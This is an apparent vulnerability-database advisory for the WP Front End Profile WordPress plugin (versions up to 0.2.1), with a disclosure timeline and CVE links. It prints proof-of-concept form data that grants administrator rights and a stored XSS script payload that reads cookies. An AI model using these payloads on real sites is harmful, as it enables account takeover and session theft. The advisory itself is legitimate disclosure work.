Lucene search
Phil WylieWPEX-ID:CB80F049-0433-44A0-9F9C-35A6E8DA820EHistorySep 14, 2016 - 12:00 a.m.
WP Front End Profile <= 0.2.1 - Privilege Escalation & Stored Cross-Site Scripting (XSS)
2016-09-1400:00:00
Phil Wylie
15
EPSS
0.002
Percentile
60.7%
It is possible to modify a POST request to overwrite user meta including ‘wp_capabilities’ and ‘wp_user_level’ which results in a privilege escalation vulnerability. User input is not sanitised or escaped on output resulting in a stored XSS vulnerability. Timeline: 2016-09-12: Vulnerability found 2016-09-12: Reported to vendor 2016-09-12: Vendor responded 2016-09-14: Vendor released a fixed version (0.2.2) 2016-09-14: Public disclosure
Privilege Escalation - Form data
profile[user_email]:[email protected]
profile[wp_capabilities][administrator]:1
profile[wp_user_level]:10
profile[user_url]:
profile[description]:
profile[wpfep_save]:Update Profile
wpfep_nonce_name:99fc626e77
_wp_http_referer:/sample-page/
Stored XSS - Form data
wpmark_tab[testing_field]:example"><script>alert(document.cookie)</script>
wpmark_tab[wpfep_save]:Update Testing
wpfep_nonce_name:02c01469d8
_wp_http_referer:/sample-page/Related
wpvulndb
wpvulndb
cve
cve
CVE-2019-15110
2019-08-21 13:15:12
CVE-2019-15111
2019-08-21 13:15:12
nvd
nvd
CVE-2019-15111
2019-08-21 13:15:12
CVE-2019-15110
2019-08-21 13:15:12
cvelist
cvelist
CVE-2019-15111
2019-08-21 12:02:18
CVE-2019-15110
2019-08-21 12:01:02
prion
prion
Cross site scripting
2019-08-21 13:15:00
Privilege escalation
2019-08-21 13:15:00